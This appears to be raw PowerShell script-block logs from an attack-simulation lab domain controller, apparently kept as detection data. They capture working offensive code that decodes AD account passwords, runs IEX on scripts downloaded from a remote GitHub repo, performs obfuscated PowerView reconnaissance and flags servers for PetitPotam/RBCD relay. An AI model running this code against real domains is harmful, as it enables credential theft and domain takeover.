4104132150x0131234Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11
Function thyme
{
[CmdletBinding()]
Param()
Write-Verbose "Getting list of domain accounts and properties..."
$qOWFQWkJJyBAHQA = Get-AdUser -Filter * -Properties * |
Select-Object samaccountname, description, UnixUserPassword, UserPassword, unicodePwd, msSFU30Name, msSFU30Password
Write-Verbose "Decoding passwords for each account..."
$WDXHnD9vwYsGpwZ = $qOWFQWkJJyBAHQA |
ForEach-Object{
$9cSMwcpwwzrH99O = $_.samaccountname
$rBMtxJeoGJA9Yhj = $_.description
$bhmVADTWCNyQDBH = $_.UnixUserPassword | ForEach-Object {$_};
if($bhmVADTWCNyQDBH -notlike ""){
$nzzlIDaKM9vOLrt = [System.Text.Encoding]::ASCII.GetString($bhmVADTWCNyQDBH)
}else{
$nzzlIDaKM9vOLrt = ""
}
$ZRSWg9WgXyKazVf = $_.UserPassword | ForEach-Object {$_};
if($ZRSWg9WgXyKazVf -notlike ""){
$DwmUahhxYUnMUDt = [System.Text.Encoding]::ASCII.GetString($ZRSWg9WgXyKazVf)
}else{
$DwmUahhxYUnMUDt = ""
}
$OBybvX99wOAvlkZ = $_.unicodePwd | ForEach-Object {$_};
if($OBybvX99wOAvlkZ -notlike ""){
$y9pF9GQs9pQkpOJ = [System.Text.Encoding]::ASCII.GetString($OBybvX99wOAvlkZ)
}else{
$y9pF9GQs9pQkpOJ = ""
}
$EUiMUEHJrJXautU = $_.msSFU30Name
$JOQyEkZGOmgldPR = $_.msSFU30Password | ForEach-Object {$_};
if ($JOQyEkZGOmgldPR -notlike ""){
$fwQxQ9NxpGxJ9ZN = [System.Text.Encoding]::ASCII.GetString($JOQyEkZGOmgldPR)
}else{
$fwQxQ9NxpGxJ9ZN = ""
}
if(($nzzlIDaKM9vOLrt) -or ($DwmUahhxYUnMUDt) -or ($fwQxQ9NxpGxJ9ZN) -or ($y9pF9GQs9pQkpOJ)){
$CavAHRzKsaosfJM = New-Object PSObject
$CavAHRzKsaosfJM | add-member Noteproperty SamAccountName $9cSMwcpwwzrH99O
$CavAHRzKsaosfJM | add-member Noteproperty Description $rBMtxJeoGJA9Yhj
$CavAHRzKsaosfJM | add-member Noteproperty UnixUserPassword $nzzlIDaKM9vOLrt
$CavAHRzKsaosfJM | add-member Noteproperty UserPassword $DwmUahhxYUnMUDt
$CavAHRzKsaosfJM | add-member Noteproperty unicodePwd $y9pF9GQs9pQkpOJ
$CavAHRzKsaosfJM | add-member Noteproperty msSFU30Name $EUiMUEHJrJXautU
$CavAHRzKsaosfJM | add-member Noteproperty msSFU30Password $fwQxQ9NxpGxJ9ZN
}
$CavAHRzKsaosfJM
}
$WDXHnD9vwYsGpwZ | Sort-Object SamAccountName -Unique
$uMHAowvnLDtltPM = $wNoLcmbD9sQ9FkA.Count
write-verbose "Decoded passwords for $uMHAowvnLDtltPM domain accounts."
}
fcef06e9-89ea-4b8c-839f-584ec771cc0a
4104152150x0131124Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11function generaldomaininfo{
Param
(
[Switch]
$noninteractive,
[Switch]
$consoleoutput
)
if(!$consoleoutput){pathcheck}
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
#Search for AD-Passwords in description fields
Write-Host -ForegroundColor Yellow '-------> Searching for passwords in active directory description fields..'
iex ($admodule)
iex (new-object net.webclient).downloadstring($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/adpass.ps1')
if(!$consoleoutput){thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"}else{Write-Host -ForegroundColor Yellow '-------> Passwords in description fields:';thyme}
IEX (New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/view.ps1')
$domain_Name = skulked
$Domain = $domain_Name.Name
Write-Host -ForegroundColor Yellow '-------> Starting Domain Recon phase:'
Write-Host -ForegroundColor Yellow 'Creating Domain User-List:'
Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:'
if(!$consoleoutput){inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"}else{inset}
#P0werview functions, string replaced version
Write-Host -ForegroundColor Yellow '-------> All those PowerView Network Skripts for later Lookup getting executed and saved:'
if(!$consoleoutput){
try{
skulked >> "$currentPath\DomainRecon\NetDomain.txt"
televisions >> "$currentPath\DomainRecon\NetForest.txt"
misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt"
odometer >> "$currentPath\DomainRecon\NetDomainController.txt"
Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt"
Randal >> "$currentPath\DomainRecon\NetSystems.txt"
Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt"
damsels >> "$currentPath\DomainRecon\NetOU.txt"
xylophone >> "$currentPath\DomainRecon\NetSite.txt"
ignominies >> "$currentPath\DomainRecon\NetSubnet.txt"
reapportioned >> "$currentPath\DomainRecon\NetGroup.txt"
confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt"
aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt"
marinated >> "$currentPath\DomainRecon\DFSshare.txt"
liberation >> "$currentPath\DomainRecon\NetShare.txt"
cherubs >> "$currentPath\DomainRecon\NetLoggedon"
Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt"
sequined >> "$currentPath\DomainRecon\ForestTrust.txt"
ringer >> "$currentPath\DomainRecon\ForeignUser.txt"
condor >> "$currentPath\DomainRecon\ForeignGroup.txt"
}catch{Write-Host "Got an error"}
}
else
{
try{
Write-Host -ForegroundColor Yellow '-------> NetDomain'
skulked
Write-Host -ForegroundColor Yellow '-------> NetForest'
televisions
Write-Host -ForegroundColor Yellow '-------> NetForestDomain'
misdirects
Write-Host -ForegroundColor Yellow '-------> NetDomainController'
odometer
Write-Host -ForegroundColor Yellow '-------> NetUser'
Houyhnhnm
Write-Host -ForegroundColor Yellow '-------> NetSystems'
Randal
Write-Host -ForegroundColor Yellow '-------> LocalPrinter'
Get-Printer
Write-Host -ForegroundColor Yellow '-------> NetOU'
damsels
Write-Host -ForegroundColor Yellow '-------> NetSite'
xylophone
Write-Host -ForegroundColor Yellow '-------> NetSubnet'
ignominies
Write-Host -ForegroundColor Yellow '-------> NetGroup'
reapportioned
Write-Host -ForegroundColor Yellow '-------> NetGroupMember'
confessedly
Write-Host -ForegroundColor Yellow '-------> NetFileServer'
aqueduct
Write-Host -ForegroundColor Yellow '-------> DFSShare'
marinated
Write-Host -ForegroundColor Yellow '-------> NetShare'
liberation
Write-Host -ForegroundColor Yellow '-------> NetLoggedon'
cherubs
Write-Host -ForegroundColor Yellow '-------> DomainTrust'
Trojans
Write-Host -ForegroundColor Yellow '-------> ForestTrust'
sequined
Write-Host -ForegroundColor Yellow '-------> ForeigUser'
ringer
Write-Host -ForegroundColor Yellow '-------> ForeignGroup'
condor
}catch{Write-Host "Got an error"}
}
IEX ($viewdevobfs)
if(!$consoleoutput){breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"}else{Write-Host -ForegroundColor Yellow "-------> DomainPrinters";breviaries -Printers}
IEX(New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/PowershellScripts/SPN-Scan.ps1')
if(!$consoleoutput){Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"}else{Write-Host -ForegroundColor Yellow "-------> InterestingSPNs";Discover-PSInterestingServices}
if(!$consoleoutput){Get-ADUser -Filter {UserAccountControl -band 0x0020} >> "$currentPath\Vulnerabilities\UsersWithoutPasswordPolicy.txt"}else{Write-Host -ForegroundColor Yellow '-------> Users without password policy:';Get-ADUser -Filter {UserAccountControl -band 0x0020}}
# Dictionary to hold superclass names
$superClass = @{}
# List to hold class names that inherit from container and are allowed to live under computer object
$vulnerableSchemas = [System.Collections.Generic.List[string]]::new()
# Resolve schema naming context
$schemaNC = (Get-ADRootDSE).schemaNamingContext
# Enumerate all class schemas
$classSchemas = Get-ADObject -LDAPFilter '(objectClass=classSchema)' -SearchBase $schemaNC -Properties lDAPDisplayName,subClassOf,possSuperiors
# Enumerate all class schemas that computer is allowed to contain
$computerInferiors = $classSchemas |Where-Object possSuperiors -eq 'computer'
# Populate superclass table
$classSchemas |ForEach-Object {
$superClass[$_.lDAPDisplayName] = $_.subClassOf
}
# Resolve class inheritance for computer inferiors
$computerInferiors |ForEach-Object {
$class = $cursor = $_.lDAPDisplayName
while($superClass[$cursor] -notin 'top'){
if($superClass[$cursor] -eq 'container'){
$vulnerableSchemas.Add($class)
break
}
$cursor = $superClass[$cursor]
}
}
# Outpupt list of vulnerable class schemas
$vulnerableSchemas
if(!$consoleoutput){$vulnerableSchemas >> "$currentPath\Vulnerabilities\VulnerableSchemas.txt"}else{Write-Host -ForegroundColor Yellow '-------> Found vulnerable old Exchange Schema (https://twitter.com/tiraniddo/status/1420754900984631308):';$vulnerableSchemas}
Write-Host -ForegroundColor Yellow '-------> Searching for Users without password Change for a long time'
$Date = (Get-Date).AddYears(-1).ToFileTime()
if(!$consoleoutput){prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"}else{prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset}
if(!$consoleoutput){
prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users1.txt"
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users2.txt"
}
else
{
Write-Host -ForegroundColor Yellow '-------> Enabled Users'
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
}
Write-Host -ForegroundColor Yellow '-------> Searching for Unconstrained delegation Systems and Users'
if(!$consoleoutput){
$Computers = breviaries -Unconstrained -Properties DnsHostName >> "$currentPath\DomainRecon\Unconstrained_Delegation_Systems.txt"
$Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt"
$Users.samaccountname >> "$currentPath\DomainRecon\AllowDelegationUsers_samaccountnames_only.txt"
}
else
{
Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Systems'
$Computers = breviaries -Unconstrained -Properties DnsHostName
Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Users'
$Users = prostituted -AllowDelegation -AdminCount
$Users.samaccountname
}
Write-Host -ForegroundColor Yellow '-------> Identify kerberos and password policy..'
$DomainPolicy = forsakes -Policy Domain
if(!$consoleoutput){
$DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt"
$DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt"
}
else
{
$DomainPolicy.KerberosPolicy
$DomainPolicy.SystemAccess
}
Write-Host -ForegroundColor Yellow '-------> Searching for LAPS Administrators'
if(!$consoleoutput){lapschecks}else{lapschecks -noninteractive -consoleoutput}
Write-Host -ForegroundColor Yellow '-------> Searching for Systems we have RDP access to..'
if(!$consoleoutput){rewires -LocalGroup RDP -Identity $env:Username -domain $domain >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"}else{rewires -LocalGroup RDP -Identity $env:Username -domain $domain}
}7784da16-3553-4b0f-97e0-fa8266e78e46
4104132150x0131112Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local1120Get-Item -Path ".\" -Verbose).FullName
#Search for AD-Passwords in description fields
Write-Host -ForegroundColor Yellow '-------> Searching for passwords in active directory description fields..'
iex ($admodule)
iex (new-object net.webclient).downloadstring($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/adpass.ps1')
if(!$consoleoutput){thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"}else{Write-Host -ForegroundColor Yellow '-------> Passwords in description fields:';thyme}
IEX (New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/view.ps1')
$domain_Name = skulked
$Domain = $domain_Name.Name
Write-Host -ForegroundColor Yellow '-------> Starting Domain Recon phase:'
Write-Host -ForegroundColor Yellow 'Creating Domain User-List:'
Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:'
if(!$consoleoutput){inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"}else{inset}
#P0werview functions, string replaced version
Write-Host -ForegroundColor Yellow '-------> All those PowerView Network Skripts for later Lookup getting executed and saved:'
if(!$consoleoutput){
try{
skulked >> "$currentPath\DomainRecon\NetDomain.txt"
televisions >> "$currentPath\DomainRecon\NetForest.txt"
misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt"
odometer >> "$currentPath\DomainRecon\NetDomainController.txt"
Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt"
Randal >> "$currentPath\DomainRecon\NetSystems.txt"
Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt"
damsels >> "$currentPath\DomainRecon\NetOU.txt"
xylophone >> "$currentPath\DomainRecon\NetSite.txt"
ignominies >> "$currentPath\DomainRecon\NetSubnet.txt"
reapportioned >> "$currentPath\DomainRecon\NetGroup.txt"
confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt"
aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt"
marinated >> "$currentPath\DomainRecon\DFSshare.txt"
liberation >> "$currentPath\DomainRecon\NetShare.txt"
cherubs >> "$currentPath\DomainRecon\NetLoggedon"
Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt"
sequined >> "$currentPath\DomainRecon\ForestTrust.txt"
ringer >> "$currentPath\DomainRecon\ForeignUser.txt"
condor >> "$currentPath\DomainRecon\ForeignGroup.txt"
}catch{Write-Host "Got an error"}
}
else
{
try{
Write-Host -ForegroundColor Yellow '-------> NetDomain'
skulked
Write-Host -ForegroundColor Yellow '-------> NetForest'
televisions
Write-Host -ForegroundColor Yellow '-------> NetForestDomain'
misdirects
Write-Host -ForegroundColor Yellow '-------> NetDomainController'
odometer
Write-Host -ForegroundColor Yellow '-------> NetUser'
Houyhnhnm
Write-Host -ForegroundColor Yellow '-------> NetSystems'
Randal
Write-Host -ForegroundColor Yellow '-------> LocalPrinter'
Get-Printer
Write-Host -ForegroundColor Yellow '-------> NetOU'
damsels
Write-Host -ForegroundColor Yellow '-------> NetSite'
xylophone
Write-Host -ForegroundColor Yellow '-------> NetSubnet'
ignominies
Write-Host -ForegroundColor Yellow '-------> NetGroup'
reapportioned
Write-Host -ForegroundColor Yellow '-------> NetGroupMember'
confessedly
Write-Host -ForegroundColor Yellow '-------> NetFileServer'
aqueduct
Write-Host -ForegroundColor Yellow '-------> DFSShare'
marinated
Write-Host -ForegroundColor Yellow '-------> NetShare'
liberation
Write-Host -ForegroundColor Yellow '-------> NetLoggedon'
cherubs
Write-Host -ForegroundColor Yellow '-------> DomainTrust'
Trojans
Write-Host -ForegroundColor Yellow '-------> ForestTrust'
sequined
Write-Host -ForegroundColor Yellow '-------> ForeigUser'
ringer
Write-Host -ForegroundColor Yellow '-------> ForeignGroup'
condor
}catch{Write-Host "Got an error"}
}
IEX ($viewdevobfs)
if(!$consoleoutput){breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"}else{Write-Host -ForegroundColor Yellow "-------> DomainPrinters";breviaries -Printers}
IEX(New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/PowershellScripts/SPN-Scan.ps1')
if(!$consoleoutput){Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"}else{Write-Host -ForegroundColor Yellow "-------> InterestingSPNs";Discover-PSInterestingServices}
if(!$consoleoutput){Get-ADUser -Filter {UserAccountControl -band 0x0020} >> "$currentPath\Vulnerabilities\UsersWithoutPasswordPolicy.txt"}else{Write-Host -ForegroundColor Yellow '-------> Users without password policy:';Get-ADUser -Filter {UserAccountControl -band 0x0020}}
# Dictionary to hold superclass names
$superClass = @{}
# List to hold class names that inherit from container and are allowed to live under computer object
$vulnerableSchemas = [System.Collections.Generic.List[string]]::new()
# Resolve schema naming context
$schemaNC = (Get-ADRootDSE).schemaNamingContext
# Enumerate all class schemas
$classSchemas = Get-ADObject -LDAPFilter '(objectClass=classSchema)' -SearchBase $schemaNC -Properties lDAPDisplayName,subClassOf,possSuperiors
# Enumerate all class schemas that computer is allowed to contain
$computerInferiors = $classSchemas |Where-Object possSuperiors -eq 'computer'
# Populate superclass table
$classSchemas |ForEach-Object {
$superClass[$_.lDAPDisplayName] = $_.subClassOf
}
# Resolve class inheritance for computer inferiors
$computerInferiors |ForEach-Object {
$class = $cursor = $_.lDAPDisplayName
while($superClass[$cursor] -notin 'top'){
if($superClass[$cursor] -eq 'container'){
$vulnerableSchemas.Add($class)
break
}
$cursor = $superClass[$cursor]
}
}
# Outpupt list of vulnerable class schemas
$vulnerableSchemas
if(!$consoleoutput){$vulnerableSchemas >> "$currentPath\Vulnerabilities\VulnerableSchemas.txt"}else{Write-Host -ForegroundColor Yellow '-------> Found vulnerable old Exchange Schema (https://twitter.com/tiraniddo/status/1420754900984631308):';$vulnerableSchemas}
Write-Host -ForegroundColor Yellow '-------> Searching for Users without password Change for a long time'
$Date = (Get-Date).AddYears(-1).ToFileTime()
if(!$consoleoutput){prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"}else{prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset}
if(!$consoleoutput){
prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users1.txt"
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users2.txt"
}
else
{
Write-Host -ForegroundColor Yellow '-------> Enabled Users'
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
}
Write-Host -ForegroundColor Yellow '-------> Searching for Unconstrained delegation Systems and Users'
if(!$consoleoutput){
$Computers = breviaries -Unconstrained -Properties DnsHostName >> "$currentPath\DomainRecon\Unconstrained_Delegation_Systems.txt"
$Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt"
$Users.samaccountname >> "$currentPath\DomainRecon\AllowDelegationUsers_samaccountnames_only.txt"
}
else
{
Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Systems'
$Computers = breviaries -Unconstrained -Properties DnsHostName
Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Users'
$Users = prostituted -AllowDelegation -AdminCount
$Users.samaccountname
}
Write-Host -ForegroundColor Yellow '-------> Identify kerberos and password policy..'
$DomainPolicy = forsakes -Policy Domain
if(!$consoleoutput){
$DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt"
$DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt"
}
else
{
$DomainPolicy.KerberosPolicy
$DomainPolicy.SystemAccess
}
Write-Host -ForegroundColor Yellow '-------> Searching for LAPS Administrators'
if(!$consoleoutput){lapschecks}else{lapschecks -noninteractive -consoleoutput}
Write-Host -ForegroundColor Yellow '-------> Searching for Systems we have RDP access to..'
if(!$consoleoutput){rewires -LocalGroup RDP -Identity $env:Username -domain $domain >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"}else{rewires -LocalGroup RDP -Identity $env:Username -domain $domain}
}
function Invoke-RBDC-over-DAVRPC
{
<#
.DESCRIPTION
Search in AD for pingable Windows servers and Check if they are vulnerable to RBCD via Petitpotam + relay to ldap.
https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb
Author: @S3cur3Th1sSh1t
License: BSD 3-Clause
#>
#Domain Recon
[CmdletBinding()]
Param (
[Switch]
$noninteractive,
[Switch]
$consoleoutput
)
if(!$consoleoutput){pathcheck}
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX ($viewdevobfs)
$serversystems = "yes"
if(!$noninteractive)
{
$serversystems = Read-Host -Prompt 'Start DAV RPC Scan for Windows Servers only (alternatively we can scan all Servers + Clients but this can take a while)? (yes/no)'
}
if ($serversystems -eq "yes" -or $serversystems -eq "y" -or $serversystems -eq "Yes" -or $serversystems -eq "Y")
{
if(Test-Path -Path "$currentPath\DomainRecon\Windows_Servers.txt")
{
Write-Host -ForegroundColor Yellow "Found an existing Server list, using this one instead of generating a new one!"
$ActiveServers = Get-Content "$currentPath\DomainRecon\Windows_Servers.txt"
}
else
{
Write-Host -ForegroundColor Yellow 'Searching for active Servers in the domain, this can take a while depending on the domain size'
$ActiveServers = breviaries -Ping -OperatingSystem "Windows Server*"
$ActiveServers = $ActiveServers.dnshostname
if(!$consoleoutput){$ActiveServers >> "$currentPath\DomainRecon\Windows_Servers.txt"}
}
foreach ($acserver in $ActiveServers)
{
try{
$path = ""
$path = Get-ChildItem -Path "\\$acserver\pipe\DAV RPC SERVICE"
if (!($path -eq $null))
{
Write-Host -ForegroundColor Yellow "Found vulnerable Server - " + $acserver + ". If no LDAP Signing is enforced (default config) you can pwn via https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb!"
539376b5-df59-4eb3-a515-f3baeb693298
4104152150x0118234Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11{net user /domain
get-localgroupmember -group Users
get-aduser -filter *}8af983db-73fc-49a5-bd4e-34ceffd93fa9
4104152150x0118232Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11& {net user /domain
get-localgroupmember -group Users
get-aduser -filter *}d7f80551-76c8-4156-8960-76d94e6acc30